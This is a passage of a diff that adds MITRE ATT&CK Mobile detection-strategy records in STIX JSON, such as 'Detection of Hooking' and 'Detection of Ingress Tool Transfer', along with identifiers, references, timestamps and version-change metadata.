+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f463fae8-5697-4539-b6c7-e67aadf81c73",
+                        "x-mitre-analytic--1076f33e-a959-49b8-97a3-2edf0360fae2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--39efdb0b-2a05-4caf-8f37-876dfad294d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0663",
+                            "external_id": "DET0663"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation of Remote Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ee4ce869-6b88-46f8-829a-9838f7607a8f",
+                        "x-mitre-analytic--6d2d8aff-7d23-40bc-bc29-54852baed5f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5848450c-38a7-421d-910c-9a10870f4ea3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0638",
+                            "external_id": "DET0638"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of File Deletion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f6be418e-3fed-4026-b665-f055465c7359"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--afab91d6-8af3-47cd-b899-cacfbb8cad6d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0682",
+                            "external_id": "DET0682"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of File and Directory Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--36cb5f92-996c-42f4-be7e-43c5e21eee2e",
+                        "x-mitre-analytic--0048442c-54c9-4816-a2ba-5e9d376d0bf2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c048a994-166a-42d0-a2d3-63e3cbc09117",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0637",
+                            "external_id": "DET0637"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Foreground Persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2df1959e-8ec4-4193-9cb8-c089c78b4d1c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4809a26b-8527-49dc-81aa-ac2750fd3b75",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0676",
+                            "external_id": "DET0676"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of GUI Input Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2867d1e0-cf83-4d83-bc6c-cc03404c3521",
+                        "x-mitre-analytic--8062d295-9d02-40c5-9ef9-135d08c07a22"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--12414f0e-85ca-4403-873a-6d415c2020f4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0608",
+                            "external_id": "DET0608"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Generate Traffic from Victim",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5c280910-f7cf-4e7a-9b99-a592115dbc8b",
+                        "x-mitre-analytic--ccb42e9d-557f-4dc5-b313-75fb6b212821"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--19bf9f62-3909-4d68-b287-bb9ccd826fe5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0648",
+                            "external_id": "DET0648"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Geofencing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9b4be141-9743-4113-a5f6-2d1a019b0eeb",
+                        "x-mitre-analytic--2f2ed160-9093-4b1f-b781-8660552bf1e5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--11b4d80e-e15b-45b5-81c8-5ebbcdd814f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0640",
+                            "external_id": "DET0640"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hide Artifacts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--964fc2e0-96fc-4992-b89a-8101d47b7d8c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b5259538-b169-47fd-a57c-521ad3f3a858",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0694",
+                            "external_id": "DET0694"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hijack Execution Flow",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--09ea8707-d76c-44ae-b077-19a8949faa90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2d8db41e-e12e-46ff-be11-2810b0a2acb5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0719",
+                            "external_id": "DET0719"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hooking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dd1b3351-f8e5-480e-9e7d-f9cfbbf01409"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5560747b-ad67-478e-b3f2-14e55864e532",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0687",
+                            "external_id": "DET0687"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Impair Defenses",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e13d662d-a496-4997-b26a-39e71eb17fc2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a7e4704b-4286-4928-88df-d0c151432495",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0662",
+                            "external_id": "DET0662"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Impersonate SS7 Nodes",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b2120e89-a453-4575-8458-7700ea59f85a",
+                        "x-mitre-analytic--9bc8daed-e8ea-4c70-95bc-dcb2905b33d3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1f04ccee-f8b2-4af3-bc34-e5b54d2c883e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0651",
+                            "external_id": "DET0651"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Indicator Removal on Host",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--50e52979-5f21-4a02-99f3-fc1858b73369",
+                        "x-mitre-analytic--4773bc29-5272-45d5-92bd-b24a34b16df6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5aa9f16e-253d-4ca6-b5e2-8311e5a76290",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0718",
+                            "external_id": "DET0718"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Ingress Tool Transfer",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--86aa8777-e12a-4dab-81ed-354bed18f3db",
+                        "x-mitre-analytic--d7e3296a-9f95-4061-b3f5-0f02910745ab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--19522fac-bfd0-4e94-9d75-a61eacbef7c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0705",
+                            "external_id": "DET0705"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Input Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9b036696-9e1e-42b9-9bfd-3ae785e7e10e",
+                        "x-mitre-analytic--7179bc7d-a2be-4ded-8c4f-88ec8f73e613"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--12a7802a-b0c2-4823-b03d-e59b2c4bc4de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0612",
+                            "external_id": "DET0612"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Input Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dda0e909-cceb-40eb-bff0-6bd0cd74e638"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2627c9c4-0241-41b7-b494-657cc58d4611",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0708",
+                            "external_id": "DET0708"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Internet Connection Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4708044d-651a-40c7-a1b2-6d7f13d17d7d",
+                        "x-mitre-analytic--0d358eda-4f7e-462e-8201-96d8a661001d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b44bea1e-fc01-4c6b-b7c4-dcb0135de936",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0664",
+                            "external_id": "DET0664"
+                        }
+                    ],
